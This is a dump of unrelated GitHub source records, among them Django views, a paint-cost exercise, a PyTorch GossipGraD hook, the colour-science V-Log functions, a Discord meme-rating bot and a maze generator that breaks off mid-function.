i.description, \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['results_themes'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n\n return render(request, '../templates/csgo/forum/topic_search.html', context)\n","repo_name":"ershovdan/mf-website-2021","sub_path":"csgo_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11100596549","text":"'''\nFaça um Programa para uma loja de tintas. O programa deverá pedir o tamanho em metros quadrados da área a ser pintada.\nConsidere que a cobertura da tinta é de 1 litro para cada 6 metros quadrados e que a tinta é vendida em latas de 18 litros,\nque custam R$ 80,00 ou em galões de 3,6 litros, que custam R$ 25,00.\nInforme ao usuário as quantidades de tinta a serem compradas e os respectivos preços em 3 situações:\ncomprar apenas latas de 18 litros;\ncomprar apenas galões de 3,6 litros;\nmisturar latas e galões, de forma que o preço seja o menor. Acrescente 10% de folga e sempre arredonde os valores para cima, isto é, considere latas cheias.\n'''\n\nfrom math import ceil\ni = (' ARCO-IRIS TINTAS ')\nprint('{:/^150}'.format(i))\n\narea = float(input('Qual o tamanho da área a ser pintada em m²: '))\nquantidade_tinta = area / 6\nquantidade_lata = (quantidade_tinta / 18)\nquantidade_galao = (quantidade_tinta / 3.6)\n# aproxima o valor das divisões para o valor mais alto\nquantidade_tinta = ceil(quantidade_tinta)\nquantidade_lata = ceil(quantidade_lata)\nquantidade_galao = ceil(quantidade_galao)\n\ncusto1 = (quantidade_lata * 80.00)\ncusto2 = (quantidade_galao * 25.00)\nprint('=-'* 150)\nprint('você vai utilizar {} litros de tinta'.format(quantidade_tinta))\n#menu de opções\nprint('''\n[1] comprar apenas latas de 18 litros sendo R$ 80,00 cada uma\n[2] comprar apenas galões de 3.6 litros sendo R$ 25,00 cada um\n[3] misturar latas e galões onde cada lata custa R$ 80.00 e os galões R$ 25,00 cada ''')\nopcao = int(input('selecione um opção: '))\nprint('-='*150)\nif opcao == 1:\n print('Você vai gastar {} latas de tinta, no valor final de {} reais '.format(quantidade_lata, custo1))\n\nelif opcao == 2:\n print('Você vai gastar {} galoẽs de tinta, no valor final de {} reais '.format(quantidade_galao, custo2))\n\nelif opcao == 3:\n misto1 = quantidade_tinta // 18 # calculo da quantidade exata de latas de tinta\n misto2 = (quantidade_tinta % 18) / 3.6 # pega o que sobrou da divisão e divide para saber quantos galões utilizar\n misto2 = ceil(misto2)\n custo3 = misto1 * 80.00\n custo4 = misto2 * 25.00\n custo_total = custo3 + custo4\n print('Você irá utilizar {} lata e {} galoẽs, no valor final de {} reais'.format(misto1, misto2, custo_total))\nelse:\n print('Escolha uma opção valida')\n","repo_name":"JoseJunior23/Iniciando-Python","sub_path":"treinando_pythonLista1/ex 017.py","file_name":"ex 017.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3859678683","text":"from django.core.management.base import BaseCommand\n\nfrom promo_code.services import get_code_file_info\nfrom promo_code.apps import PromoCodeConfig\n\n\nclass Command(BaseCommand):\n help = \"Выводит количество групп и кодов в файле.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"-p\",\n \"--path\",\n type=str,\n default=PromoCodeConfig.promo_codes_file_path,\n help=\"Путь к файлу с кодами\")\n\n\n def handle(self, *args, **kwargs):\n path = kwargs[\"path\"]\n\n if path is None or path == \"\" :\n self.stdout.write(\"Укажите путь: -p <путь к файлу>\")\n return\n try:\n info = get_code_file_info(path)\n except FileNotFoundError:\n self.stdout.write(\"Файл не найден\")\n self.stdout.write(\"Проверьте путь к файлу\")\n return\n except ValueError:\n self.stdout.write(\"Не получается получить данные из файла\")\n self.stdout.write(\"Проверьте содержимое файла\")\n return\n except AssertionError:\n self.stdout.write(\"Неверно указаны параметры команды\")\n return\n \n if info is None: \n self.stdout.write(\"Не удалось получить данные о файле\")\n self.stdout.write(\"Проверьте содержимое\")\n return\n self.stdout.write(f\"В файле {info['groups']} групп, {info['codes']} промо кодов\")\n ","repo_name":"e-gulakhmet/PromoCodeAdmin","sub_path":"app/promo_code/management/commands/get_file_info.py","file_name":"get_file_info.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"40387764506","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.selector import Selector\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom shutil import which\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nclass ProductsSpider(scrapy.Spider):\n name = 'products'\n allowed_domains = ['data.afca.org.au']\n start_urls = ['https://data.afca.org.au/banking-and-finance']\n\n \n def __init__(self):\n #chrome_options = Options()\n #chrome_options.add_argument(\"--headless\")\n chrome_path = which(\"chromedriver\")\n driver = webdriver.Chrome(executable_path=chrome_path) #, options = chrome_options)\n driver.set_window_size(1920,1080)\n driver.get('https://data.afca.org.au/banking-and-finance')\n try:\n WebDriverWait(driver,100).until(EC.presence_of_element_located((By.CLASS_NAME, \"tableExContainer\")))\n self.html = driver.page_source\n ##need to work out where to click to get started on the looping!\n finally:\n driver.quit()\n \n def parse(self, response):\n resp = Selector(text=self.html)\n for MyElements in resp.xpath(\"//div[@class='tableEx']\"):\n yield {\n 'thing':(MyElements)\n }\n","repo_name":"arrghh1/afcaScraper","sub_path":"afca/spiders/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"33544130125","text":"from eros_core import Eros, TransportStates\n\nCOLOR_RED = \"\\033[91m\"\nCOLOR_GREEN = \"\\033[92m\"\nCOLOR_YELLOW = \"\\033[93m\"\nCOLOR_RESET = \"\\033[0m\"\n\nclass TransportStatusHandler():\n def __init__(self, eros):\n eros: Eros \n eros.transport_handle.attach_status_change_callback(self.status_change_callback)\n \n \n def status_change_callback(self, state):\n if (state == TransportStates.CONNECTING):\n print(f\"{COLOR_YELLOW}Connection lost, reconnecting...{COLOR_RESET}\")\n if (state == TransportStates.CONNECTED):\n print(f\"{COLOR_GREEN}Connection established{COLOR_RESET}\")\n if (state == TransportStates.DEAD):\n print(f\"{COLOR_RED}Connection lost{COLOR_RESET}\")","repo_name":"Florioo/eros-cli-python","sub_path":"src/eros_cli/app/utils/transport_status_log.py","file_name":"transport_status_log.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71343696911","text":"import math\nimport random\nfrom enum import Enum, auto\nfrom itertools import cycle\n\nimport torch\nimport torch.distributed as dist\nfrom torch._C._distributed_c10d import ProcessGroup\nfrom torch.distributed.algorithms._comm_hooks import default\nfrom torch.distributed.fsdp import FullyShardedDataParallel as FSDP\n\n# Setting a constant for situations, when communication peer\n# is not present in a current environment. This may happen in CUBE topology,\n# when a number of nodes is not equal to a power of 2. In this case, both\n# send and receive peers are equal to INVALID_PEER and no communication is\n# performed.\nINVALID_PEER = -1\n\n\nclass Topology(Enum):\n r\"\"\"\n Specifies which topology will be used as a base for gradient communication.\n For more information, please refer to the original\n `paper `_\n\n CUBE:\n A hypercube topology - a hierarchical virtual organization of compute nodes.\n For this topology gossiping is happening with a neighboring vertex.\n\n >>> *----*\n >>> /| /|\n >>> *----* |\n >>> | * -|-*\n >>> |/ |/\n >>> *----*\n\n DISSEMINATION:\n A dissemination topology has similar property\n as hypercube virtual topology.\n For this topology gossiping is happening with the neighboring node,\n then every 2nd node, every 4th, etc.\n\n >>> . * .\n >>> * *\n >>> . .\n >>> * *\n >>> . .\n >>> * *\n >>> . * .\n\n .. note::\n Current implementation does not support uneven number of nodes for a CUBE\n topology.\n\n \"\"\"\n CUBE = auto()\n DISSEMINATION = auto()\n\n\nclass GossipGraDState(default.DefaultState):\n r\"\"\"\n Stores state needed to perform GossipGraD algorithm within a communication hook.\n\n .. note:: Note that this hook should be used with the NCCL PG backend and users\n must set the current GPU device with `torch.cuda.set_device` prior to\n ``GossipGraDState`` initialization, otherwise it will lead to\n unexpected hang issues during the gossiping stage.\n\n Args:\n num_modules (int): Number of FSDP modules to identify how many communication\n calls will be performed during a backpropagation pass.\n topology (Topology): A virtual topology to be used for gradient communication.\n (default: DISSEMINATION)\n local_process_group (ProcessGroup): Stores local subgroup,\n where intra-node communication will happen,\n by default a subgroup is initialized to workers, belonging to the same node.\n Should be provided together with `num_nodes`. When every local process group\n contains only one worker, then this worker is considered to be a separate\n node and local ``all_reduce`` and ``broadcast`` are not performed.\n (default: None)\n num_nodes (int): Number of nodes in a compute environment.\n Should be provided together with `local_process_group`.\n By default is initialized to the number of generated local subgroups.\n (default: None)\n master_process_group (ProcessGroup): Stores main workers,\n which are involved in inter-node communication. By default, will be\n composed from the workers with rank 0 in the local process group.\n (default: None)\n proc_per_node (int): Number of workers in each node. By default is initialized\n to the size of a local subgroup.\n (default: None)\n random_seed (int): A random seed, so that randomly generated topologies\n were the same on every worker.\n (default: 2403)\n\n \"\"\"\n\n def __init__(\n self,\n num_modules,\n topology=None,\n local_process_group=None,\n num_nodes=None,\n master_process_group=None,\n proc_per_node=None,\n random_seed=2403,\n ):\n if num_modules is None or num_modules < 1:\n raise ValueError(\"`num_nodes` should bea positive integer.\")\n self.num_modules = num_modules\n self.topology = topology or Topology.DISSEMINATION\n if local_process_group is None and num_nodes is None:\n self.local_process_group, subgroups = dist.new_subgroups()\n self.num_nodes = len(subgroups)\n else:\n if (\n local_process_group is not None\n and num_nodes is None\n or local_process_group is None\n and num_nodes is not None\n ):\n raise ValueError(\n \"`local_process_group` and `num_nodes` should be provided together.\"\n )\n self.local_process_group = local_process_group\n if num_nodes < 1:\n raise ValueError(\"`num_nodes` should be equal to 1 or more.\")\n self.num_nodes = num_nodes\n\n if self.num_nodes % 2 != 0 and self.topology == Topology.CUBE:\n raise ValueError(\n \"Current implementation doesn't support uneven number\"\n \" of nodes for CUBE topology.\"\n )\n\n super().__init__(self.local_process_group)\n self.proc_per_node = (\n proc_per_node\n if proc_per_node is not None\n else self.local_process_group.size()\n )\n if self.proc_per_node < 1:\n raise ValueError(\"`proc_per_node` should be equal to 1 or more.\")\n\n self.master_process_group = (\n master_process_group\n if master_process_group is not None\n else self._create_master_group()\n )\n\n self.random_seed = random_seed\n self.topologies = self._generate_topologies(self.random_seed)\n self.cur_topology = next(self.topologies)\n\n # For `num_nodes` != power of 2 `gossip_period` should still be an int.\n # If we only have 1 node, `gossip_period` should be equal to 1.\n self.gossip_period = max(1, math.ceil(math.log(self.num_nodes, 2)))\n self.iter = 0\n\n # Get rank for current device\n self.rank = dist.get_rank()\n\n # Master worker for a current local `process_group`\n self.master_worker = dist.distributed_c10d._get_global_rank(\n self.local_process_group, 0\n )\n\n def _create_master_group(self):\n r\"\"\"\n Creates master process group, i.e. a group of workers,\n which communicate gradients between different nodes.\n \"\"\"\n # Every 0th worker on every node will be assigned to a master group,\n # i.e. if number of rocesses per node is 8, master group contains\n # 0th, 8th, 16th, 24th, 32nd, ... ranks\n ranks = [i * self.proc_per_node for i in range(self.num_nodes)]\n return dist.new_group(ranks)\n\n def _generate_topologies(self, random_seed):\n r\"\"\"\n Creates `num_nodes` random topology shuffles and returns an infinite iterator.\n Original topology is of the form:\n [0*K, 1*K, ... , N*K],\n where N is the number of nodes and K - the number of workers on each node.\n For example, with N=4 and K=8, original topology is\n [0, 8, 16, 24]\n\n Workers' rank values are used instead of node values for easier peer assignment\n in a collective communication stage.\n\n Returns:\n An infinite iterator over created topologies\n \"\"\"\n random.seed(random_seed)\n topologies_set = []\n original_list = [i * self.proc_per_node for i in range(self.num_nodes)]\n for _ in range(self.num_nodes):\n random.shuffle(original_list)\n topologies_set.append(original_list.copy())\n\n return cycle(topologies_set)\n\n\ndef _get_send_recv_peers(state):\n r\"\"\"\n Computes peers for the collective communication stage.\n For a ``CUBE`` topology a node sends grads to and receives from\n the same neighboring vertex. A pick for a neighboring vertex\n depends on the step number and current virtual topology in use.\n\n For a ``DISSEMINATION`` topology a node typically sends grads\n to and receives from different neighbors, but there may be a step\n where send and receive peers are the same node. A pick for send and receive peers\n depends on the step number and current virtual topology in use.\n\n For more information, please refer to the original\n `paper `_\n\n Args:\n state (GossipGradState): State for GossipGraD communication hook.\n\n Returns:\n Peers' global ranks to whom a current node sends gradients\n and from whom it is received.\n \"\"\"\n assert state.gossip_period > 0, \"`gossip_period` should be greater than 0.\"\n power = (state.iter // state.num_modules) % state.gossip_period\n # Our new node_rank is a position of a global rank in\n # a virtual topology\n node_rank = state.cur_topology.index(state.rank)\n\n if state.topology == Topology.CUBE:\n peer_idx = node_rank ^ 2**power\n if peer_idx >= len(state.cur_topology):\n return INVALID_PEER, INVALID_PEER\n return state.cur_topology[peer_idx], state.cur_topology[peer_idx]\n\n elif state.topology == Topology.DISSEMINATION:\n send_peer_idx = (node_rank + 2**power) % state.num_nodes\n recv_peer_idx = (node_rank - 2**power + state.num_nodes) % state.num_nodes\n return state.cur_topology[send_peer_idx], state.cur_topology[recv_peer_idx]\n\n\ndef _gossip(state, grad, scaling_factor=0.5):\n r\"\"\"\n Gossiping stage.\n\n At this step, it obtains communication peers,\n stacks ``torch.distributed.irecv`` and ``torch.distributed.isend`` operations,\n and performs communication with ``torch.distributed.batch_isend_irecv``.\n Finally, received and current gradients are added together\n and scaled appropriately, i.e. since communication happens\n only between 2 peers at a time, summed gradients are divided\n by 2 (or multiplied by 0.5)\n\n For more information, please refer to the original\n `paper `_\n\n Args:\n state (GossipGradState): State for GossipGraD communication hook.\n grad (torch.Tensor): A gradient for the local batch\n that needs to be communicated across ranks.\n scaling_facto (float): Scaling factor to apply after\n received and current gradients are combined.\n\n \"\"\"\n send_peer, recv_peer = _get_send_recv_peers(state)\n\n if send_peer == INVALID_PEER or recv_peer == INVALID_PEER:\n return\n\n assert send_peer is not None and recv_peer is not None, (\n \"Failed to calculate send and receive peers: \"\n f\"(`send_peer` is {send_peer} and `recv_peer` is {recv_peer})\"\n )\n # Need to check that send and receive peers are not equal to a current rank\n assert send_peer != state.rank and recv_peer != state.rank, (\n \"Expected send and receive peers to differ from a current rank: \"\n f\"(current rank is {state.rank}, `send_peer` is {send_peer}\\\n and `recv_peer` is {recv_peer})\"\n )\n assert (\n send_peer != -1 and recv_peer != -1\n ), \"Communication peers are not present in a current topology\"\n recv_grad = torch.empty_like(grad)\n ops = []\n\n # For ranks not in the `master_process_group`,\n # `master_process_group` is an `object` instance\n assert isinstance(\n state.master_process_group, ProcessGroup\n ), \"`master_process_group` is not an instance of `ProcessGroup`\"\n\n ops.append(\n dist.P2POp(\n op=dist.isend, tensor=grad, peer=send_peer, group=state.master_process_group\n )\n )\n ops.append(\n dist.P2POp(\n op=dist.irecv,\n tensor=recv_grad,\n peer=recv_peer,\n group=state.master_process_group,\n )\n )\n reqs = dist.batch_isend_irecv(ops)\n for req in reqs:\n req.wait()\n grad.add_(recv_grad).mul_(scaling_factor)\n\n\ndef get_num_modules(module: torch.nn.Module):\n r\"\"\"\n Returns number of FSDP modules in a provided FSDP instance.\n\n Args:\n module (torch.nn.Module): FSDP instance\n\n Returns:\n int: number of FSDP modules that are nested in the input ``module``,\n including self.\n\n \"\"\"\n return len(FSDP.fsdp_modules(module))\n\n\ndef gossip_grad_hook(state: GossipGraDState, grad: torch.Tensor):\n r\"\"\"\n Communication hook, that follows\n `GossipGraD `_ strategy.\n\n Every ``state.gossip_period`` step a virtual topology is changed.\n Before an inter-node communication happens, gradients are reduced locally,\n i.e. in an intra-node fashion.\n\n Only workers from a master process group are participating in a gossiping stage.\n Finally, every main worker broadcasts final gradient to its local subgroup\n\n Args:\n state (GossipGradState): State for GossipGraD communication hook.\n grad (torch.Tensor): A gradient for the local batch\n that needs to be communicated across ranks.\n\n Here is an example for how to initialize a default ``GossipGraD state``\n and register an fsdp model with a communication hook.\n ::\n\n >>> import torch\n >>> import torch.distributed as dist\n >>> from torch.distributed.fsdp import(\n >>> FullyShardedDataParallel as FSDP\n >>> )\n >>> from torchdistx.gossip_grad import(\n >>> GossipGraDState,\n >>> Topology,\n >>> get_num_modules,\n >>> gossip_grad_hook\n >>> )\n >>>\n >>> net = torch.nn.Linear(4, 10)\n >>> fsdp_net = FSDP(net)\n >>> state = GossipGraDState(num_modules=get_num_modules(fsdp_net))\n >>> fsdp_net.register_comm_hook(state, gossip_grad_hook)\n\n \"\"\"\n # Virtual topology changes every `state.gossip_period` step.\n # FSDP net can consist of multiple FSDP modules and every module will\n # increase `state.iter` during the backward pass. As a result, we need\n # to adjust for this behavior and make sure that virtual topology doesn't\n # change in the middle of the backward pass.\n if (state.iter // state.num_modules) % state.gossip_period == 0:\n state.cur_topology = next(state.topologies)\n\n # Reduce local gradients\n default.allreduce_hook(state, grad)\n # Perform gossiping step between master nodes (via master workers)\n if not dist._rank_not_in_group(state.master_process_group):\n _gossip(state, grad)\n # Broadcast received gradients in the local process group\n dist.broadcast(grad, src=state.master_worker, group=state.local_process_group)\n\n state.iter += 1\n","repo_name":"pytorch/torchdistx","sub_path":"src/python/torchdistx/gossip_grad.py","file_name":"gossip_grad.py","file_ext":"py","file_size_in_byte":14728,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"83"} +{"seq_id":"29205730240","text":"import tensorflow as tf\n\nimport model\nimport node\n\nCAPACITY = 100000\n\ndef value_to_priority(spca, value, tag):\n # The upper bound value \n max_priority = tf.cast(1 << 24, tf.float32)\n priority_value = tf.cast((1. - value / spca.frobenius_norm) * max_priority, tf.int64)\n return tf.bitwise.left_shift(priority_value, 32) + tf.cast(tag, tf.int64)\n\ndef extract_tag(priority_value):\n return tf.cast(priority_value & 0xFFFFFFFF, tf.int32)\n\ndef new_search_queue(spca):\n root_node_y, root_node_branch_var = node.build_root(spca)\n queue = tf.queue.PriorityQueue(\n CAPACITY,\n [tf.int32],\n [tf.TensorShape([spca.n])],\n )\n queue.enqueue([value_to_priority(spca, 0., root_node_branch_var), root_node_y])\n return queue\n\n@tf.function\ndef step(spca, queue, best_obj, best_y):\n if queue.size() < CAPACITY:\n priority_val, node_y = queue.dequeue()\n branch_node = extract_tag(priority_val)\n node_1, bounds_1, proj_1, node_2, bounds_2, proj_2, node_best, node_best_bound = node.process_node(spca, node_y, branch_node)\n # Non-terminal node to be added to the queue.\n if bounds_1[1] > best_obj and bounds_1[0] != bounds_1[1]:\n queue.enqueue([value_to_priority(spca, bounds_1[1], proj_1), node_1])\n if bounds_2[1] > best_obj and bounds_2[0] != bounds_2[1]:\n queue.enqueue([value_to_priority(spca, bounds_2[1], proj_2), node_2])\n if node_best_bound > best_obj:\n return node_best_bound, node_best\n else:\n return best_obj, best_y\n else:\n return best_obj, best_y\n","repo_name":"ringw/l0pca","sub_path":"l0pca/branchbound/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71025795471","text":"\"\"\"\nPanasonic V-Log Log Encoding\n============================\n\nDefines the *Panasonic V-Log* log encoding:\n\n- :func:`colour.models.log_encoding_VLog`\n- :func:`colour.models.log_decoding_VLog`\n\nReferences\n----------\n- :cite:`Panasonic2014a` : Panasonic. (2014). VARICAM V-Log/V-Gamut (pp.\n 1-7).\n http://pro-av.panasonic.net/en/varicam/common/pdf/VARICAM_V-Log_V-Gamut.pdf\n\"\"\"\n\nfrom __future__ import annotations\n\nimport numpy as np\n\nfrom colour.hints import ArrayLike, NDArrayFloat\nfrom colour.models.rgb.transfer_functions import full_to_legal, legal_to_full\nfrom colour.utilities import Structure, as_float, from_range_1, to_domain_1\n\n__author__ = \"Colour Developers\"\n__copyright__ = \"Copyright 2013 Colour Developers\"\n__license__ = \"BSD-3-Clause - https://opensource.org/licenses/BSD-3-Clause\"\n__maintainer__ = \"Colour Developers\"\n__email__ = \"colour-developers@colour-science.org\"\n__status__ = \"Production\"\n\n__all__ = [\n \"CONSTANTS_VLOG\",\n \"log_encoding_VLog\",\n \"log_decoding_VLog\",\n]\n\nCONSTANTS_VLOG: Structure = Structure(\n cut1=0.01, cut2=0.181, b=0.00873, c=0.241514, d=0.598206\n)\n\"\"\"*Panasonic V-Log* constants.\"\"\"\n\n\ndef log_encoding_VLog(\n L_in: ArrayLike,\n bit_depth: int = 10,\n out_normalised_code_value: bool = True,\n in_reflection: bool = True,\n constants: Structure = CONSTANTS_VLOG,\n) -> NDArrayFloat:\n \"\"\"\n Define the *Panasonic V-Log* log encoding curve / opto-electronic transfer\n function.\n\n Parameters\n ----------\n L_in\n Linear reflection data :math`L_{in}`.\n bit_depth\n Bit-depth used for conversion.\n out_normalised_code_value\n Whether the non-linear *Panasonic V-Log* data :math:`V_{out}` is\n encoded as normalised code values.\n in_reflection\n Whether the light level :math`L_{in}` to a camera is reflection.\n constants\n *Panasonic V-Log* constants.\n\n Returns\n -------\n :class:`numpy.ndarray`\n Non-linear data :math:`V_{out}`.\n\n Notes\n -----\n +------------+-----------------------+---------------+\n | **Domain** | **Scale - Reference** | **Scale - 1** |\n +============+=======================+===============+\n | ``L_in`` | [0, 1] | [0, 1] |\n +------------+-----------------------+---------------+\n\n +------------+-----------------------+---------------+\n | **Range** | **Scale - Reference** | **Scale - 1** |\n +============+=======================+===============+\n | ``V_out`` | [0, 1] | [0, 1] |\n +------------+-----------------------+---------------+\n\n References\n ----------\n :cite:`Panasonic2014a`\n\n Examples\n --------\n >>> log_encoding_VLog(0.18) # doctest: +ELLIPSIS\n 0.4233114...\n\n The values of *Fig.2.2 V-Log Code Value* table in :cite:`Panasonic2014a`\n are obtained as follows:\n\n >>> L_in = np.array([0, 18, 90]) / 100\n >>> np.around(log_encoding_VLog(L_in, 10, False) * 100).astype(np.int_)\n array([ 7, 42, 61])\n >>> np.around(log_encoding_VLog(L_in) * (2**10 - 1)).astype(np.int_)\n array([128, 433, 602])\n >>> np.around(log_encoding_VLog(L_in) * (2**12 - 1)).astype(np.int_)\n array([ 512, 1733, 2409])\n\n Note that some values in the last column values of\n *Fig.2.2 V-Log Code Value* table in :cite:`Panasonic2014a` are different\n by a code: [512, 1732, 2408].\n \"\"\"\n\n L_in = to_domain_1(L_in)\n\n if not in_reflection:\n L_in = L_in * 0.9\n\n cut1 = constants.cut1\n b = constants.b\n c = constants.c\n d = constants.d\n\n V_out = np.where(\n L_in < cut1,\n 5.6 * L_in + 0.125,\n c * np.log10(L_in + b) + d,\n )\n\n V_out_cv = (\n V_out if out_normalised_code_value else legal_to_full(V_out, bit_depth)\n )\n\n return as_float(from_range_1(V_out_cv))\n\n\ndef log_decoding_VLog(\n V_out: ArrayLike,\n bit_depth: int = 10,\n in_normalised_code_value: bool = True,\n out_reflection: bool = True,\n constants: Structure = CONSTANTS_VLOG,\n) -> NDArrayFloat:\n \"\"\"\n Define the *Panasonic V-Log* log decoding curve / electro-optical transfer\n function.\n\n Parameters\n ----------\n V_out\n Non-linear data :math:`V_{out}`.\n bit_depth\n Bit-depth used for conversion.\n in_normalised_code_value\n Whether the non-linear *Panasonic V-Log* data :math:`V_{out}` is\n encoded as normalised code values.\n out_reflection\n Whether the light level :math`L_{in}` to a camera is reflection.\n constants\n *Panasonic V-Log* constants.\n\n Returns\n -------\n :class:`numpy.ndarray`\n Linear reflection data :math`L_{in}`.\n\n Notes\n -----\n +------------+-----------------------+---------------+\n | **Domain** | **Scale - Reference** | **Scale - 1** |\n +============+=======================+===============+\n | ``V_out`` | [0, 1] | [0, 1] |\n +------------+-----------------------+---------------+\n\n +------------+-----------------------+---------------+\n | **Range** | **Scale - Reference** | **Scale - 1** |\n +============+=======================+===============+\n | ``L_in`` | [0, 1] | [0, 1] |\n +------------+-----------------------+---------------+\n\n References\n ----------\n :cite:`Panasonic2014a`\n\n Examples\n --------\n >>> log_decoding_VLog(0.423311448760136) # doctest: +ELLIPSIS\n 0.1799999...\n \"\"\"\n\n V_out = to_domain_1(V_out)\n\n V_out = (\n V_out if in_normalised_code_value else full_to_legal(V_out, bit_depth)\n )\n\n cut2 = constants.cut2\n b = constants.b\n c = constants.c\n d = constants.d\n\n L_in = np.where(\n V_out < cut2,\n (V_out - 0.125) / 5.6,\n 10 ** ((V_out - d) / c) - b,\n )\n\n if not out_reflection:\n L_in = L_in / 0.9\n\n return as_float(from_range_1(L_in))\n","repo_name":"colour-science/colour","sub_path":"colour/models/rgb/transfer_functions/panasonic_v_log.py","file_name":"panasonic_v_log.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","stars":1843,"dataset":"github-code","pt":"83"} +{"seq_id":"22209955006","text":"class Solution:\n def scoreOfParentheses(self, s: str) -> int:\n def dfs(l, r):\n res = count = 0\n for i in range(l, r + 1):\n count += 1 if s[i] == '(' else -1\n if count == 0:\n res += 1 if i - l == 1 else 2 * dfs(l + 1, i - 1)\n l = i + 1\n return res\n return dfs(0, len(s) - 1)","repo_name":"KrushnaSonwane/LeetCode-Solutions","sub_path":"0856-score-of-parentheses/0856-score-of-parentheses.py","file_name":"0856-score-of-parentheses.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"3039166976","text":"\"\"\"\nauthor: Alex Sutay\nfile: chartle.py\n\"\"\"\n\nimport discord\nfrom Charles_Chortles.data_manage import total_current, add_entry, find_average, add_to_current, scores_str, \\\n remove_last_input, set_current, AuthorException, get_current\nfrom Charles_Chortles.config import TOKEN\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_message(message):\n channel = message.channel\n text = message.content\n try:\n\n # if the bot sent the message, ignore it\n if message.author == client.user:\n return\n\n # If the message contains an image, assume it's a meme and set the current user to be rated to the author\n if len(message.attachments) > 0:\n set_current(message.author)\n\n # if the message says \"!help\", send the help message\n if text == \"!help\":\n # await channel.send(\"!help - this message\\n!remove - remove the last score\"\n # \"\\ndone - add the current score to the total as an image instance\\n!average - display \"\n # \"the Charles Chortle average\\n!total - display a summary of all the images so far\")\n await channel.send(\"Currently under maintenance. Bug me and I might fix this.\")\n\n \"\"\"\n # if the message says \"done\", send the stats\n elif message.content == \"done\":\n total = total_current()\n add_entry()\n average = find_average()\n await channel.send(\"Total score for this image: \"+str(total)+\"\\nAverage score overall: \"+str(average))\n \"\"\"\n\n # if the message says \"!remove\", remove an image instance\n elif text.startswith(\"!remove\"):\n # remove_last_input()\n # await channel.send(\"Removed the most recent score.\")\n await channel.send(\"Currently under maintenance. Bug me and I might fix this.\")\n\n elif message.content == \"!average\":\n average = find_average()\n current = get_current()\n await channel.send(\"The current average score for\" + current + \" is: \"+str(average))\n\n elif message.content == \"!current\":\n current = get_current()\n await channel.send(\"The current user is \" + current)\n\n # if the message starts with \"+\", take that as a command adding to the score\n elif message.content.startswith('+'):\n try:\n message_txt = message.content\n message_txt = message_txt.split(\" \")\n message_txt = message_txt[0]\n score = float(message_txt[1:])\n add_to_current(str(message.author), score)\n await channel.send(str(score) + \" has been added to the score.\")\n except AuthorException as e:\n await channel.send(\"You can't rate your own meme\")\n except Exception as e:\n await channel.send(message.author.mention + \" has caused an error and needs to do better!\")\n await channel.send(\"Error:\" + str(e))\n\n # if the message is \"!total\", print the totals\n elif message.content == \"!total\":\n msg = scores_str()\n if len(msg) > 2000:\n msg = msg[-1999:]\n await channel.send(msg)\n\n except Exception as e:\n await channel.send(\"Uh oh, that did not work. Oops. Here's the error, someone should fix it.\")\n await channel.send(\"Error:\" + str(e))\n\n\n@client.event\nasync def on_ready():\n print(\"Logged in as\")\n print(client.user.name)\n print(client.user.id)\n\n\nclient.run(TOKEN)\n","repo_name":"alex-sutay/discordBots","sub_path":"Charles_Chortles/chartle.py","file_name":"chartle.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"1606663876","text":"import random\nimport queue\n\n\nclass Maze:\n def __init__(self, m=30, n=40, N = 80):\n if m>N or n>N:\n exit()\n self.R = [[False for col in range(N)] for row in range(N)]\n self.D = [[False for col in range(N)] for row in range(N)]\n self.v = [[False for col in range(N)] for row in range(N)]\n self.row = [-1, 0, 1, 0]\n self.col = [0, -1, 0, 1]\n self.m = m\n self.n = n\n\n def dfs_generate(self, start_dim=(0, 0)):\n r = start_dim[0]\n c = start_dim[1]\n self.dfs(r, c)\n\n def dfs(self, r, c):\n d = random.randrange(0, 4)\n tmp = random.randrange(0, 2)\n dd = 1 if tmp == 1 else 3\n self.v[r][c] = True\n for i in range(4):\n rr = r + self.row[d]\n cc = c + self.col[d]\n if (rr >= 0 and rr < self.m) and (cc >= 0 and cc < self.n) and self.v[rr][cc] == False:\n # print(\"?\")\n if d % 2 == 1:\n self.R[r][c - (d == 1)] = True\n else:\n self.D[r - (d == 0)][c] = True\n self.dfs(rr, cc)\n d = (d + dd) % 4\n\n # try not to use this, it's awful\n def bfs_generate(self, start_dim=(0, 0)):\n q = queue.Queue()\n q.put(start_dim)\n have_visited = 0\n self.v[start_dim[0]][start_dim[1]] = True\n while have_visited= 0 and rr < self.m) and (cc >= 0 and cc < 